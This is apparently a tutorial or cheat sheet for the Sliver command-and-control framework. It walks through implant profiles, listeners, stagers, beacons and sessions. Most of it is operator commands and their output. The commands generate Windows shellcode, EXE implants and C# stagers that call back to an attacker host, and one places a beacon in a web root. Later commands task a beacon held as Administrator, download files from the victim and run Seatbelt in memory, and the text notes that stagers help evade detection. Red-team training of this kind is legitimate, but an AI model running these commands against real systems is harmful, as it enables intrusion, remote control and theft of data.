Implants

PROFILE

Profiles are sorts of Implant blueprints that define a configuration to be reused by the profiles new command. we should configure the protocol we would like to use for that profile (ex. --mtls). Also we have different --format, in the end without any parameter is name of profiles (ex. win-shellcode or dc01-pivot)

sliver > profiles new --mtls 13.13.13.13 --format shellcode win-shellcode
sliver > profiles new --mtls 13.13.13.13:8888 --format exe --arch amd64 --os windows dc01-pivot

Generating the implant based on profiles

sliver > profiles generate dc01-pivot --save /home/user/

To use command with using profiles, you just nee to use profiles and then the command, so that command becomes a sub-command.

LISTENER

Before you can catch the shell, you'll first need to start a listener. You use the commands mtls, http, https, and dns to start listeners for each protocol. You can use the jobs command to view and manage listeners running in the background. Listeners support both sessions and beacons callbacks:

sliver > http -L 13.13.13.13 -l 8088
sliver > jobs
 ID   Name   Protocol   Port    Stage Profile 
==== ====== ========== ======= ===============
 1    grpc   tcp        31337                 
 2    http   tcp        8088

STAGER

Stagers are used to: keep payload smalls, appear non malicious, and avoid detection. This will keep things nice and simple and will reduce the complexity of our payloads.

Sliver supports the meterpreter staging protocol over TCP and HTTP(S). This protocol is pretty straight forward:

• read the size of the stage 2 payload on the wire (the first 4 bytes for the TCP stager)

• download the stage 2

• allocate the size read in the first step, and write the stage in memory

For this to work, we need the following pieces:

• a staging server (the Sliver server)

• a stage 2 payload (usually a Sliver shellcode, but can be in other formats)

• stagers (generated by msfvenom, the Sliver generate stager command, or a custom one)

sliver > generate stager --lhost 13.13.13.13 --lport 4443 --format csharp --save staged.txt

SESSION

The use command will tab-complete session and beacon identifiers, but you can also type them out if you really want to (identifier prefixes are accepted). Additionally, running the use command with no arguments will enter an interactive menu to select from.

sliver > use 8ff2ce4c

When you are done with the session, run background. The session will of course remain active.

BEACON

Implants in beacon mode are generated using protocols like mTLS, HTTP(s), or DNS to provide asynchronous C2. Unlike sessions, beacons sleep between callbacks to minimize the network footprint. While --skip-symbols reduces file size by removing obfuscation, it significantly increases the risk of detection by endpoint security solutions.

sliver > generate beacon --mtls 13.13.13.13 --skip-symbols --os windows --arch amd64 --format exe --save /var/www/html --seconds 5 --jitter 3

Upon execution, the beacon registers with the C2 server, assigning a unique ID to that specific process. This ID persists through the life of the implant. The "Next Check-in" time is calculated using the sleep interval (--seconds 5) plus a random variance (--jitter 3), preventing a predictable heartbeat. Use beacons to track these check-ins in real-time and use to connect to it.

[server] sliver > beacons

 ID         Name                     Tasks   Transport   Remote Address        Hostname          Username                        Operating System   Last Check-In    Next Check-In
========== ======================== ======= =========== ===================== ================= =============================== ================== ================ ===============
 8c465643   RELATIVE_ADVERTISEMENT   0/0     mtls       13.13.13.13:54701     WIN-1TT1Q345B37   WIN-1TT1Q345B37\Administrator   windows/amd64      49.385459s ago   37.614549s

[server] sliver > use 8c465643-0e65-45f2-bb7e-acb3480de3cb

[*] Active beacon RELATIVE_ADVERTISEMENT (8c465643-0e65-45f2-bb7e-acb3480de3cb)

You should see a blue prompt indicating that we're interacting with a beacon as opposed to a session (red). Commands are executed the same way as a session, though not all commands are supported in beacon mode.

[server] sliver (RELATIVE_ADVERTISEMENT) > ls

[*] Tasked beacon RELATIVE_ADVERTISEMENT (962978a6)

[+] RELATIVE_ADVERTISEMENT completed task 962978a6

C:\git
======
drwxrwxrwx  a                           <dir>     Wed Dec 22 15:34:56 -0600 2021

Tasks will execute in the order they were created (FIFO).

Tasks results will block until all tasks that were part of the same "check-in" have completed. If you have one short running and one long running tasks that are executed as part of the same check-in the short task results will wait for the results of the long running task. Consider executing long running tasks on their own interval. This includes tasks assigned by multiple operators, as the implant is not "aware" of the multiple operators.

You can view previous tasks executed by the active beacon using the tasks command:

[server] sliver (RELATIVE_ADVERTISEMENT) > tasks

 ID         State       Message Type   Created                         Sent                            Completed
========== =========== ============== =============================== =============================== ===============================
 90294ad2   completed   Ls             Sat, 22 Jan 2022 14:45:00 CST   Sat, 22 Jan 2022 14:45:11 CST   Sat, 22 Jan 2022 14:45:11 CST
 962978a6   completed   Ls             Sat, 22 Jan 2022 14:42:43 CST   Sat, 22 Jan 2022 14:43:53 CST   Sat, 22 Jan 2022 14:43:53 CST

You can use the interactive command to task a beacon to open an interactive session, with no arguments the current C2 channel will be used:

[server] sliver (RELATIVE_ADVERTISEMENT) > interactive

When you're done using the interactive session use the close command to close the interactive session without killing the implant; the beacon will still perform check-ins while an interactive session is open.

COMMANDS & TOOLS

When we are connected to beacon or session, sliver gives us plenty of commands and tools we can use to use, for seeing them type help, and to check specific tool info use help cat or cat --help. Some commands would work for certain OS, some are versatile.

Download

sliver (http-session) > download Pictures

[*] Wrote 291 bytes (1 file successfully, 0 files unsuccessfully) to /home/v17/http-session_download_Pictures_1711090807.tar.gz

Downloaded directories would be packed in .tar.gz archive

Upload

sliver (http-session) > upload test.txt C:\\Users\\john\\Desktop\\test.txt
sliver (http-session) > upload test.txt C:/Users/john/Desktop/test.txt

[*] Wrote file to C:\Users\john\Desktop\test.txt

execute-assembly

execute-assembly allows us to run .NET binaries on the target machine, without uploading them. However, it will spawn a child process.

sliver (http-session) > execute-assembly Seatbelt.exe -group=system